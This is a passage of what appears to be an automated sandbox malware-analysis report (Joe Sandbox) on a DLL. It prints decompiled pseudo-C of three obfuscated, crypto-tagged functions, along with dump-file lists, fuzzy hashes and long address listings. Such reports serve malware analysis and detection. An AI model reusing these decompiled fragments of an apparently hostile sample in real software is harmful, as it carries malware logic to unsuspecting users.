            0x6d501f81
            0x6d501f82
            0x6d501f83
            0x6d501f87
            0x6d501f87
            0x6d501f9e
            0x6d501fad
            0x6d501fb8
            0x6d501fc7
            0x6d501fd7
            0x6d501fe5
            0x6d501fe8
            0x6d501ff9

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b65f0892f4ac0bbe1ffa96c700450fabc1c23dbc965db4980c9d18329633df1f
            • Instruction ID: 2d5baa9e7ac4a42bb7031cc409ad0f3634082489f57db9baafc5eddb2c6df6d4
            • Opcode Fuzzy Hash: b65f0892f4ac0bbe1ffa96c700450fabc1c23dbc965db4980c9d18329633df1f
            • Instruction Fuzzy Hash: EFA14A725083918FCB1ACF29C090666BBF1FBCA308F56496EE886C7751D774A941CF52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D515CA6 Relevance: .2, Instructions: 229COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 94%
            			E6D515CA6() {
				signed short _t181;
				signed int* _t182;
				signed int _t184;
				signed short _t186;
				signed int _t193;
				signed int _t194;
				signed int _t197;
				signed int _t203;
				intOrPtr _t208;
				signed int _t210;
				signed int _t212;
				signed int _t219;
				intOrPtr _t222;
				signed short _t225;
				signed int _t235;
				intOrPtr _t236;
				intOrPtr _t237;
				intOrPtr _t247;
				intOrPtr _t249;
				signed int _t272;
				void* _t274;
				intOrPtr _t275;
				signed int _t278;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t284;
				signed int _t285;
				intOrPtr _t286;
				signed int _t292;
				signed int _t293;
				signed char _t298;
				intOrPtr _t304;
				signed char _t318;
				signed char* _t329;
				signed int _t332;
				signed short _t333;
				signed int _t337;
				signed int _t339;
				signed int* _t343;
				signed int _t346;
				intOrPtr _t347;
				void* _t349;
				void* _t355;

				_t181 =  *0x6d55d5cc; // 0x0
				_t275 =  *((intOrPtr*)(_t349 + 0x24));
				_t182 = _t181 + 1;
				 *0x6d55d5cc = _t182;
				 *(_t349 + 0x10) = _t182;
				_t272 =  *(_t349 + 0x4c);
				_t339 =  *0x6d55d5d4; // 0x0
				 *(_t349 + 0x14) =  *(_t275 + _t272 + 1) & 0x000000ff;
				_t184 =  *0x6d55d5d8; // 0x0
				 *(_t349 + 0xc) = _t184;
				_t186 =  *(_t349 + 0x58) + 1;
				 *(_t349 + 0x58) = _t186;
				_t346 = _t186 & 0x0000ffff ^  *( *((intOrPtr*)(_t349 + 0x2c)) + 0x76b0);
				 *((intOrPtr*)(_t349 + 0x24)) = 0x1a04 -  *((intOrPtr*)( *(_t349 + 0x40) + 0x62dc));
				 *(_t349 + 0x28) = _t346;
				 *(_t349 + 0x14) =  *((intOrPtr*)( *(_t349 + 0x40) + _t339 * 4)) + 0x1068;
				_t193 =  *0x6d55d5ac; // 0x0
				 *(_t349 + 0x40) = _t193;
				_t194 =  *0x6d55d57c; // 0x0
				_t332 =  *( *((intOrPtr*)(_t349 + 0x48)) + _t194 * 2) & 0x0000ffff;
				if(_t332 <= 0x36f) {
					_t333 =  *(_t349 + 0x20);
					L5:
					_t304 =  *0x6d55d5a8; // 0x0
					_t197 =  *0x6d55d5a0; // 0x0
					 *0x6d55d574 = ( *(_t304 + _t197 * 4) & 0x00001629 /  *0x6d55d58c * 0x00001aa5) /  *0x6d55d574;
					_t278 =  *0x6d55d578; // 0x0
					 *(_t349 + 0x40) =  *(_t349 + 0x40) |  *( *(_t349 + 0x10) + 0x20 + _t272 * 4);
					_t203 =  *0x6d55d590; // 0x0
					_t279 =  *0x6d55d594; // 0x0
					_t347 =  *((intOrPtr*)(_t349 + 0x3c));
					 *0x6d55d584 = (_t203 * _t339 /  *(_t346 + 0x14 + _t278 * 4) &  *(_t279 +  *(_t349 + 0x38) * 4)) /  *0x6d55d584;
					_t208 =  *0x6d55d5c8; // 0x0
					if( *((intOrPtr*)(_t208 + ( *0x6d55d59c & 0x0000ffff) * 4)) == ( *0x6d55d5d0 & 0x0000ffff)) {
						L13:
						_t210 =  *0x6d55d5b8; // 0x0
						asm("cdq");
						 *( *(_t349 + 0x14) +  *(_t349 + 0x40) * 4) = _t210 %  *( *(_t349 + 0x14) +  *(_t349 + 0x40) * 4);
						_t212 =  *0x6d55d5a0; // 0x0
						 *( *(_t349 + 0x4c) + _t272) =  *( *(_t349 + 0x4c) + _t272) &  *( *((intOrPtr*)(_t349 + 0x48)) + _t212 * 2);
						_t283 =  *0x6d55d5a8; // 0x0
						_t284 =  *(_t349 + 0x38);
						 *(_t272 * 0xc +  *((intOrPtr*)(_t349 + 0x44))) = (( *( *((intOrPtr*)(_t349 + 0x18)) + 0x363) & 0x000000ff) /  *(_t283 + _t272 * 4) | 0x00000147) *  *(_t272 * 0xc +  *((intOrPtr*)(_t349 + 0x44)));
						_t219 =  *0x6d55d578; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + _t219 * 4)) == _t284) {
							 *((char*)(_t284 * 3 + _t347)) =  *((char*)(_t284 * 3 + _t347)) + 0x58;
							_t285 =  *0x6d55d578; // 0x0
							_t222 =  *0x6d55d594; // 0x0
							 *((intOrPtr*)(_t222 + 0x14 + _t285 * 4)) = 0x73f;
							 *0x6d55d578 =  *0x6d55d578 + 1;
							 *0x6d55d59c =  *0x6d55d59c & 0x00000f1a;
						}
						L15:
						return 0x1eb3;
					}
					_t318 =  *(_t272 + _t347);
					if((_t318 & 0x000000ff) !=  *((intOrPtr*)(_t349 + 0x5c))) {
						goto L13;
					}
					_t225 =  *0x6d55d59c; // 0x0
					_t355 =  *0x6d55d5c0 - _t225; // 0x0
					if(_t355 > 0) {
						_t286 =  *0x6d55d5a8; // 0x0
						 *(_t286 +  *( *(_t349 + 0x10)) * 4) = ((_t318 & 0x000000ff) +  *0x6d55d5e0 ^  *0x6d55d5d8) %  *(_t286 +  *( *(_t349 + 0x10)) * 4);
						 *0x6d55d58c =  *0x6d55d58c - 1;
						 *0x6d55d5b8 =  *(_t349 + 0x38);
						_t235 =  *(_t349 + 0x28);
						 *((intOrPtr*)(_t235 + 8 + ( *0x6d55d59c & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t235 + 8 + ( *0x6d55d59c & 0x0000ffff) * 4)) + (( *0x6d55d5c4 & 0x0000ffff) - ( *(_t272 + _t347) & 0x000000ff) ^  *0x6d55d5b4) * ( *0x6d55d5c0 & 0x0000ffff);
						_t292 =  *(_t235 + 0x1c + _t272 * 4);
						_t236 =  *0x6d55d594; // 0x0
						if(_t292 !=  *((intOrPtr*)(_t236 + _t272 * 4))) {
							goto L15;
						}
						_t237 =  *((intOrPtr*)(_t349 + 0x30));
						_t337 =  *(_t349 + 0x14);
						_t343 = _t237 + 0x1c + _t292 * 4;
						do {
							 *_t343 =  *_t343 | ( *(_t237 + 0x2fb4) ^  *0x6d55d5ac) &  *(_t337 + 0x39d0) |  *0x6d55d598;
							_t343 =  &(_t343[1]);
							 *0x6d55d59c = 0x16e1 -  *0x6d55d59c;
							asm("cdq");
							_t247 =  *0x6d55d594; // 0x0
							_t292 = _t292 + 1;
							 *0x6d55d58a = (( *( *((intOrPtr*)(_t349 + 0x54)) + 0x150a) & 0x0000ffff) % _t272 ^  *(_t272 + _t347) ^ 0x00000086) -  *0x6d55d58a;
							_t237 =  *((intOrPtr*)(_t349 + 0x30));
						} while (_t292 ==  *((intOrPtr*)(_t247 + _t272 * 4)));
						goto L15;
					}
					 *( *((intOrPtr*)(_t349 + 0x54)) + _t339 * 2) =  *( *((intOrPtr*)(_t349 + 0x54)) + _t339 * 2) | _t333;
					_t249 =  *0x6d55d570; // 0x0
					_t293 =  *0x6d55d5d4; // 0x0
					asm("cdq");
					 *(_t249 + _t293 * 4 + 4) = ( *( *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x24)))) + _t347) & 0x000000ff |  *0x6d55d57c) %  *(_t249 + _t293 * 4 + 4);
					goto L15;
				}
				 *(_t349 + 0x20) = _t272 * 0xc;
				 *(_t349 + 0x34) = _t332 + _t275;
				_t274 =  *((intOrPtr*)(_t349 + 0x18)) - _t275;
				do {
					asm("cdq");
					 *0x6d55d5d0 = _t332 / ( *0x6d55d5d0 & 0x0000ffff);
					asm("cdq");
					_t329 =  *(_t349 + 0x34);
					 *0x6d55d5d4 = (( *(_t274 +  *(_t349 + 0x34)) & 0x000000ff) + _t332) / _t339;
					 *0x6d55d580 =  *0x6d55d580 |  *0x6d55d59c & 0x0000ffff;
					 *((intOrPtr*)( *(_t349 + 0x20) + _t346 + 0x20)) =  *((intOrPtr*)( *(_t349 + 0x20) + _t346 + 0x20)) + ( *_t329 & 0x000000ff) + ( *0x6d55d5c4 & 0x0000ffff);
					_t298 =  *0x6d55d58a; // 0x0
					 *0x6d55d5c4 = (_t298 & 0x000000ff) - _t332;
					 *0x6d55d58a = _t298 + 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + _t332 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t349 + 0x50)) + _t332 * 4)) + 0x1bc4;
					_t332 = _t332 + 1;
					_t339 =  *0x6d55d5d4; // 0x0
					 *(_t349 + 0x34) =  &(_t329[1]);
				} while (_t332 > 0x36f);
				_t333 =  *0x6d55d5cc; // 0x0
				_t272 =  *(_t349 + 0x58);
				goto L5;
			}














































            0x6d515ca9
            0x6d515cae
            0x6d515cb2
            0x6d515cb7
            0x6d515cbc
            0x6d515cc1
            0x6d515cc7
            0x6d515cd2
            0x6d515cd6
            0x6d515cdb
            0x6d515ce3
            0x6d515ce7
            0x6d515cf0
            0x6d515d05
            0x6d515d0d
            0x6d515d19
            0x6d515d1d
            0x6d515d22
            0x6d515d26
            0x6d515d2b
            0x6d515d35
            0x6d515de3
            0x6d515de7
            0x6d515df4
            0x6d515e00
            0x6d515e18
            0x6d515e25
            0x6d515e2b
            0x6d515e2f
            0x6d515e3b
            0x6d515e45
            0x6d515e62
            0x6d515e67
            0x6d515e6f
            0x6d515fa8
            0x6d515fb7
            0x6d515fbc
            0x6d515fc2
            0x6d515fc4
            0x6d515fd6
            0x6d515fdd
            0x6d515ff1
            0x6d515ffe
            0x6d516001
            0x6d516009
            0x6d51600e
            0x6d516012
            0x6d516018
            0x6d51601d
            0x6d51602a
            0x6d516030
            0x6d516030
            0x6d516037
            0x6d516043
            0x6d516043
            0x6d515e75
            0x6d515e80
            0x00000000
            0x00000000
            0x6d515e86
            0x6d515e8c
            0x6d515e93
            0x6d515ecb
            0x6d515eed
            0x6d515eef
            0x6d515f03
            0x6d515f1e
            0x6d515f22
            0x6d515f26
            0x6d515f2a
            0x6d515f32
            0x00000000
            0x00000000
            0x6d515f38
            0x6d515f3c
            0x6d515f43
            0x6d515f46
            0x6d515f5e
            0x6d515f6b
            0x6d515f6e
            0x6d515f7f
            0x6d515f82
            0x6d515f93
            0x6d515f94
            0x6d515f9d
            0x6d515f9d
            0x00000000
            0x6d515fa3
            0x6d515e99
            0x6d515e9d
            0x6d515ea2
            0x6d515ebb
            0x6d515ebf
            0x00000000
            0x6d515ebf
            0x6d515d3e
            0x6d515d45
            0x6d515d4f
            0x6d515d51
            0x6d515d5a
            0x6d515d5d
            0x6d515d6d
            0x6d515d70
            0x6d515d74
            0x6d515d80
            0x6d515d96
            0x6d515d9a
            0x6d515da8
            0x6d515db2
            0x6d515db8
            0x6d515dbf
            0x6d515dc0
            0x6d515dc7
            0x6d515dcb
            0x6d515dd7
            0x6d515ddd
            0x00000000

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cb7b37083b559d9b1f206cd5e2e650df69fc7ae529dcdb41f3e948551ea3bca2
            • Instruction ID: e5e017b1e8e2ba67df08b14f39b3c5992821a9bfc014b72456356dc15210811c
            • Opcode Fuzzy Hash: cb7b37083b559d9b1f206cd5e2e650df69fc7ae529dcdb41f3e948551ea3bca2
            • Instruction Fuzzy Hash: BCB14776608291CFCB46CF28C080A25BBF1FBCA308B56455EE886CBB51D7B5E951CF52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D502E9F Relevance: .2, Instructions: 208COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 67%
            			E6D502E9F(signed char* _a4, intOrPtr* _a8, intOrPtr* _a12, signed int* _a16) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _t139;
				intOrPtr _t147;
				intOrPtr _t148;
				signed int _t161;
				signed int _t166;
				intOrPtr _t171;
				signed int _t172;
				intOrPtr _t177;
				intOrPtr _t181;
				intOrPtr _t184;
				signed int _t185;
				intOrPtr* _t188;
				signed int _t197;
				intOrPtr _t198;
				intOrPtr _t199;
				intOrPtr _t200;
				signed char _t201;
				signed int _t212;
				intOrPtr _t213;
				signed int _t217;
				intOrPtr _t218;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr* _t226;
				signed int _t232;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed int _t242;
				signed int _t255;
				intOrPtr* _t261;
				signed int* _t264;
				signed int _t268;
				signed short _t269;
				signed int _t271;
				signed char* _t274;
				signed int _t275;
				signed char* _t278;
				intOrPtr _t281;
				signed int* _t283;

				_t283 =  &_v16;
				_t139 =  *0x6d55d580; // 0x0
				_t268 = _a16[_t139] &  *0x6d55d5c4 & 0x0000ffff;
				_t200 =  *0x6d55d5b4; // 0x0
				_v8 = _t268;
				_t261 = _a8;
				_v12 = _t200;
				_t242 =  *0x6d55d5d4; // 0x0
				_t212 = 1 / ( *(0x28f + ( *0x28f & 0x000000ff) * 4) & 0x000000ff) & _t200 -  *((intOrPtr*)(_t261 + _t242 * 4));
				_t147 =  *0x6d55d5e4; // 0x0
				_t148 = _t147 - 1;
				_v4 = _t212;
				_v16 = _t212;
				 *0x6d55d5e4 = _t148;
				if(_t212 != _t148) {
					_t278 = _a4;
				} else {
					while(1) {
						_t177 =  *0x6d55d570; // 0x0
						_t224 =  *0x6d55d578; // 0x0
						asm("cdq");
						_t275 =  *0x6d55d5dc; // 0x0
						_t181 =  *0x6d55d5c8; // 0x0
						asm("cdq");
						_t226 = _a16;
						 *_t226 =  *_t226 - 1;
						_push( *( *_t226 + 0x28f) & 0x000000ff);
						_push(_t275 ^ _v16);
						_push(1);
						_push( *(_t181 + ( *0x28f & 0x000000ff) * 4) / _v16);
						_push( *(_t177 + _t242 * 4) %  *(_t268 + 0x1918));
						_push( *(_t261 + 0x2c7c) & 0x000005f2);
						_push( *(_t200 + _t224 * 4) * 0xee5);
						_t184 = E6D507397();
						_t278 = _a4;
						 *((intOrPtr*)(_a16 + ( *_a12 +  *_a12) * 8)) = _t184;
						_t185 =  *0x6d55d5ac; // 0x0
						_t255 = _v16;
						_t232 = 0x28f[_t255] & 0x000000ff;
						asm("cdq");
						_t188 = _a8;
						 *_t188 =  *_t188 + 1;
						_t234 =  *0x6d55d578; // 0x0
						_t236 = _v16;
						_push( *(_a12 + _t236 * 4) * 0x6bd);
						_push(_t236 ^ 0x000005b2);
						_push(_t236);
						_push((_t278[_t234] & 0x000000ff) % ( *0x6d55d5c4 & 0x0000ffff));
						_push(( *( *_t188 + _t278) & 0x000000ff) %  *0x6d55d580);
						_push(_t255 / _t232);
						_push( *(_v12 + _t185 * 8) & _t232);
						_t197 = E6D507397();
						_t283 =  &(_t283[0xe]);
						_t268 = _v8;
						_t238 = _v16 + 1;
						 *0x6d55d590 = _t197;
						_t198 =  *0x6d55d5e4; // 0x0
						_t199 = _t198 - 1;
						_v16 = _t238;
						 *0x6d55d5e4 = _t199;
						if(_t238 != _t199) {
							break;
						}
						_t242 =  *0x6d55d5d4; // 0x0
						_t200 = _v12;
						_t261 = _a8;
					}
					_t212 = _v4;
				}
				 *_t278 =  *_t278 + 1;
				_push(0x1b5f);
				_t269 =  *0x6d55d588; // 0x0
				_v8 =  *((intOrPtr*)(( *_t278 & 0x000000ff) * 0xc + _t268 + 0x20));
				_t213 =  *0x6d55d5bc; // 0x0
				asm("cdq");
				 *0x6d55d588 = _t269 + 1;
				_t271 =  *0x6d55d580; // 0x0
				_t201 =  *0x28f;
				asm("cdq");
				 *0x28f = _t201 - 1;
				_push(_v4);
				_push( *(_v12 + _t271 * 4) / (0x28f[_t201 & 0x000000ff] & 0x000000ff));
				_push(_t271);
				_push((_t269 & 0x0000ffff) %  *(_t213 + 0x53c));
				_push(0x28f[ *_a16] & 0x000000ff ^ _t212);
				_push(_v8);
				_t161 = E6D507397();
				_t281 = _a8;
				 *(_t281 + ( *0x28f & 0x000000ff) * 4) = _t161;
				 *0x28f =  *0x28f + 1;
				_t217 =  *0x6d55d57c; // 0x0
				_t218 =  *0x6d55d594; // 0x0
				 *(_a12 + _t217 * 4) =  *(_a12 + ( *0x28f & 0x000000ff) * 4) /  *(_t218 + ( *0x28f & 0x000000ff) * 4) %  *(_a12 + _t217 * 4);
				_t166 =  *0x6d55d578; // 0x0
				_t264 = _a16;
				 *(_v12 + ( *0x28f & 0x000000ff) * 4) =  *(_v12 + ( *0x28f & 0x000000ff) * 4) | ( *(_v12 + _t166 * 8) ^  *(_v12 + ( *0x28f & 0x000000ff) * 4)) & 0x000014e2;
				_t274 = _a4;
				_t171 =  *0x6d55d598; // 0x0
				 *(_t274 +  *_t264 * 2) =  *(_t274 +  *_t264 * 2) ^ ( *(_t281 + ( *0x28f & 0x000000ff) * 4) |  *(_t171 + _t274));
				_t222 =  *0x6d55d5e0; // 0x0
				_t172 =  *0x6d55d5a0; // 0x0
				_t223 = _t222 + 1;
				 *0x6d55d5e0 = _t223;
				_t264[_t223] = _t172;
				return _t274[0x1130] & 0x000000ff ^  *0x6d55d590;
			}
















































            0x6d502e9f
            0x6d502ea2
            0x6d502ebd
            0x6d502ebf
            0x6d502ec7
            0x6d502ecf
            0x6d502ed3
            0x6d502ee4
            0x6d502ef1
            0x6d502ef3
            0x6d502ef8
            0x6d502ef9
            0x6d502efd
            0x6d502f01
            0x6d502f08
            0x6d503030
            0x6d502f0e
            0x6d502f0e
            0x6d502f0e
            0x6d502f13
            0x6d502f1c
            0x6d502f37
            0x6d502f4a
            0x6d502f52
            0x6d502f57
            0x6d502f5b
            0x6d502f66
            0x6d502f67
            0x6d502f68
            0x6d502f6a
            0x6d502f6b
            0x6d502f6c
            0x6d502f6d
            0x6d502f6e
            0x6d502f7f
            0x6d502f87
            0x6d502f8a
            0x6d502f8f
            0x6d502f98
            0x6d502f9f
            0x6d502fa8
            0x6d502fac
            0x6d502fba
            0x6d502fd1
            0x6d502fe0
            0x6d502fe8
            0x6d502fe9
            0x6d502fea
            0x6d502feb
            0x6d502fec
            0x6d502fed
            0x6d502fee
            0x6d502ff7
            0x6d502ffa
            0x6d502ffe
            0x6d502fff
            0x6d503004
            0x6d503009
            0x6d50300a
            0x6d50300e
            0x6d503015
            0x00000000
            0x00000000
            0x6d503017
            0x6d50301d
            0x6d503021
            0x6d503021
            0x6d50302a
            0x6d50302a
            0x6d503034
            0x6d50303e
            0x6d503047
            0x6d50304e
            0x6d503064
            0x6d50306a
            0x6d503078
            0x6d503081
            0x6d503087
            0x6d50309a
            0x6d5030a4
            0x6d5030aa
            0x6d5030ab
            0x6d5030ac
            0x6d5030ad
            0x6d5030ae
            0x6d5030af
            0x6d5030b3
            0x6d5030b8
            0x6d5030c7
            0x6d5030cb
            0x6d5030d2
            0x6d5030e2
            0x6d5030f4
            0x6d5030f9
            0x6d503102
            0x6d503111
            0x6d503117
            0x6d503121
            0x6d503129
            0x6d50312c
            0x6d503132
            0x6d503137
            0x6d503138
            0x6d50313e
            0x6d503161

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 306730cc186c76847834ce662c661a6657c211cbc2fc1762fd8ab8bdeaebac21
            • Instruction ID: 09e2ee9bfd17be220a95007f029b5eb8de4c7b509ed759dcc1542cb1d749e692
            • Opcode Fuzzy Hash: 306730cc186c76847834ce662c661a6657c211cbc2fc1762fd8ab8bdeaebac21
            • Instruction Fuzzy Hash: FE91BE762082808FCB5ADF29C490A26BBF1FBCE344F1644AEF9868B351D734A911CF51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D504A20 Relevance: .2, Instructions: 203COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 59%
            			E6D504A20() {
				intOrPtr _t186;
				signed int _t208;
				signed int* _t209;
				intOrPtr _t210;
				intOrPtr _t211;
				signed int _t212;
				signed int _t215;
				intOrPtr _t218;
				signed int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				void* _t224;
				intOrPtr _t225;
				signed int _t226;
				intOrPtr _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t232;
				void* _t233;

				_t210 =  *((intOrPtr*)(_t233 + 0xc));
				_t5 = _t210 + 0x792; // 0x6d5020ce
				_t220 = _t5;
				_t225 =  *((intOrPtr*)(_t233 + 0x18));
				_t208 =  *((intOrPtr*)(_t233 + 0x14)) + 0xfffffec0;
				 *((intOrPtr*)(_t233 + 0x18)) =  *(_t233 + 0x30) + 0xfffffcfa;
				_t232 =  *((intOrPtr*)(_t233 + 0x28)) + 0xffffde17;
				 *((intOrPtr*)(_t233 + 0x10)) = _t220;
				 *(_t233 + 0x30) =  *((intOrPtr*)(_t233 + 0x34)) + 0xfffff9ce;
				_t228 = _t225 + 0xe15;
				 *((intOrPtr*)(_t233 + 0x20)) =  *(_t233 + 0x24) + 0xfffff726;
				_t14 = _t210 - 0x1e7b; // 0x6d4ffac1
				 *((intOrPtr*)(_t233 + 0x1c)) = _t14;
				_t211 = _t225 + 0x8ce;
				 *((intOrPtr*)(_t233 + 0x34)) = _t211;
				if(_t228 <= _t208 + 0x32) {
					_t209 =  *(_t233 + 0x44);
					if(_t220 == (_t232 ^ _t208) + 0x2597) {
						 *_t209 = (_t211 - 0x00002749 ^ 0x0000252e) *  *_t209;
					}
					_t55 =  &(_t209[0x1d]); // 0x55d5e5f
					_t221 =  *_t55;
					_t56 =  &(_t209[0x45]); // 0x55d5dc35
					if(_t209[7] == (_t221 | _t228) *  *_t56) {
						_t58 =  &(_t209[0x35]); // 0x55d598a1
						_t226 =  *_t58;
						_t59 =  &(_t209[0x4c]); // 0xf180cb32
						_t212 =  *_t59;
						_t60 =  &(_t209[0x49]); // 0x754c8a2e
						_t222 =  *_t60;
						_t61 =  &(_t209[0x39]); // 0x2444886d
						_t229 =  *_t61;
						_t62 =  &(_t209[0x1d]); // 0x55d5e5f
						_t209[0x13] = _t209[0x13] - (_t226 * _t221 | _t212);
						_push(_t212 &  *_t62 & 0x000029b2);
						_push(_t226 |  *(_t233 + 0x24));
						_t66 =  &(_t209[0x3e]); // 0x1d7ccd3b
						_push( *_t66 ^ _t222);
						_push( *(_t233 + 0x3c) - _t229 ^ 0x000029b2);
						_t68 =  &(_t209[0x3a]); // 0xd5a8a140
						_t69 =  &(_t209[0xf]); // 0x478f0f1c
						_push( *_t68 &  *_t69);
						_t70 =  &(_t209[0x45]); // 0x55d5dc35
						_push( *_t70 -  *((intOrPtr*)(_t233 + 0x2c)) &  *(_t233 + 0x30));
						_push( *(_t233 + 0x4c) |  *(_t233 + 0x44));
						_t75 =  &(_t209[2]); // 0x548b30c4
						_push( *_t75 + 0x00001e7b ^ 0x00002b78);
						_push(( *(_t233 + 0x3c) ^ 0x00001eee) - _t222);
						_push( *((intOrPtr*)(_t233 + 0x34)) -  *(_t233 + 0x44) | 0x00002ea5);
						_t79 = _t229 + 0x2749; // 0x2444afb6
						_t80 =  &(_t209[0x64]); // 0x5b60f28
						_push( *_t80 * _t226 & 0x00002749);
						_t81 =  &(_t209[0x31]); // 0x1efe1024
						_t82 =  &(_t209[7]); // 0x38244c0b
						_push( *_t81 -  *_t82);
						_push( *(_t233 + 0x50) * 0x1df3);
						_t84 =  &(_t209[0x1d]); // 0x55d5e5f
						_push( *_t84 * _t232 *  *(_t233 + 0x6c));
						_push(_t209);
						E6D515901();
						_t86 =  &(_t209[0x2f]); // 0xfe34868d
						_t88 =  &(_t209[0x35]); // 0x55d598a1
						_t215 =  *_t88;
						_t209[7] = _t209[7] ^  *_t86 *  *(_t233 + 0x58) - 0x000024ad;
						_t91 =  &(_t209[0x34]); // 0xf22
						_t92 =  &(_t209[4]); // 0x44892c24
						_push( *_t91 *  *_t92 -  *((intOrPtr*)(_t233 + 0x60)));
						_t94 =  &(_t209[0x24]); // 0xb70f2424
						_t96 =  &(_t209[0x68]); // 0xc9b60fd1
						_push(( *_t94 ^  *(_t233 + 0x74)) & _t215);
						_t99 =  &(_t209[0x5e]); // 0x8d142454
						_t100 =  &(_t209[0x4c]); // 0xf180cb32
						_push(_t215 -  *_t96);
						_push(((_t232 - 0x000029d1 ^  *(_t233 + 0x58) | _t232) ^  *_t99) *  *_t100);
						_t101 =  &(_t209[0x52]); // 0x190cfe
						_push(( *_t101 & 0x0000260d) + 0x2ac3);
						_t103 =  &(_t209[0x1a]); // 0x820f1c24
						_push( *(_t233 + 0x88) +  *(_t233 + 0x88) -  *_t103);
						_t104 =  &(_t209[0x64]); // 0x5b60f28
						_push(_t209);
						_push( *_t104 ^  *(_t233 + 0x88));
						E6D504D09();
						_t233 = _t233 + 0x60;
					}
				} else {
					_t230 =  *(_t233 + 0x44);
					 *((intOrPtr*)(_t230 + 0x154)) = 9;
					_t21 = _t230 + 0xbc; // 0xfe34868d
					_t186 =  *_t21;
					if(_t186 <= 0x2ab3) {
						 *((intOrPtr*)(_t230 + 0x90)) =  *((intOrPtr*)(_t230 + 0x90)) + _t186 + 0xffffda69;
					}
					_t24 = _t230 + 0x138; // 0x161bb8
					_t25 = _t230 + 0xe0; // 0x55d5b4a0
					_t26 = _t230 + 0x144; // 0x81466d55
					 *((intOrPtr*)( *_t25 +  *_t24 * 4)) =  *((intOrPtr*)( *_t25 +  *_t24 * 4)) +  *_t26;
					_t31 = _t230 + 0x50; // 0x13085
					_t218 =  *_t31;
					 *((intOrPtr*)(_t230 + 0x48)) =  *((intOrPtr*)(_t218 + 0x90));
					_push(_t225 + 0x792);
					 *((intOrPtr*)(_t218 + 0x90)) =  *((intOrPtr*)(_t218 + 0x90)) + 1;
					_t219 =  *(_t233 + 0x30);
					_push( *((intOrPtr*)(_t233 + 0x1c)) + 0x32);
					_push(_t225 + 0x71c);
					_t227 =  *((intOrPtr*)(_t233 + 0x1c));
					_push(_t225 + 0x8ce);
					_t224 = _t219 + 0xe9d;
					_push( *((intOrPtr*)(_t233 + 0x2c)) + 0x2749);
					_push(_t227 - 0xdf);
					_push(_t224);
					_push(_t219 + 0xd85);
					_push(_t232 + 0x2749);
					_push(_t224);
					_push(_t208 - 0xa7f);
					_push( *((intOrPtr*)(_t233 + 0x48)) + 0x24ad);
					_push( *((intOrPtr*)(_t233 + 0x70)));
					_push(_t227);
					_push(_t232 + 0x1e7b);
					_push(_t230);
					E6D515901();
					_t233 = _t233 + 0x40;
					 *(_t230 + 0x8c) =  *( *_t230 + 0x1c) * 0x6427d784;
				}
				return  *(_t233 + 0x30) + 0x71c;
			}
























            0x6d504a25
            0x6d504a38
            0x6d504a38
            0x6d504a40
            0x6d504a44
            0x6d504a4a
            0x6d504a4e
            0x6d504a5d
            0x6d504a61
            0x6d504a65
